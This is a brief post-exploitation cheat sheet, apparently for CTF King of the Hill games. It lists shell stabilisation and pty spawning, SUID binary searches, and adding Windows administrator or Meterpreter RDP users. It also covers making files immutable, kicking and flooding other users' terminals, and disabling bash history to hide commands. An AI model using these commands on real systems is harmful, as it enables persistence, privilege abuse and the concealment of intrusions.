Linux
Stabilize Shell
- ctrl+z
- stty raw -echo
- fg (press enter x2)
- export TERM=xterm (for using the clear command)
Spawn bash
- /usr/bin/script -qc /bin/bash /dev/null
- python -c 'import pty;pty.spawn("/bin/bash")'
- python3 -c 'import pty;pty.spawn("/bin/bash")'
Finding Binaries
- find . -perm /4000 (setuid bit set, SUID)
- find . -perm /2000 (setgid bit set, SGID)
Changing file attributes
chattr +i filename making file immutable
chattr -i filename making file mutable
lsattr filename Checking file attributes
Uploading Files
scp file/you/want user@ip:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000
Windows
Adding User
net user "USER_NAME" "PASS" /add
Changing User's password
net user "USER_NAME" "NEWPASS"
Adding User to Administrators
net localgroup administrators "USER_NAME" /add
Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1. R Read
2. W Write
3. C Change
4. F Full Control
Set File bits
attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit
Show hidden file/folder
dir /a show all hidden files & folders
dir /a:d show only hidden folders
dir /a:h show only hidden files
Meterpreter
Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
King Of The Hill (KoTH)
Monitoring and Closing Shell (Linux)
- strace - debugging / tampering with processes
- gdb - C/C++ debugger
- script - records terminal activities
- w / who - check current pts (terminal device)
- ps -t pts/pts-number - process monitoring
- script /dev/pts/0 - monitor terminal
- cat /dev/urandom > /dev/pts/pts-number 2>/dev/null - prints arbitrary text on terminal
- pkill -9 -t pts/pts-number
Closing Session (Windows)
- quser
- logoff id|user_name
export HISTFILE=/dev/null - found this, it might help you out a little when doing KOTH. It basically stops bash logging your commands in the ~/.bash_history file.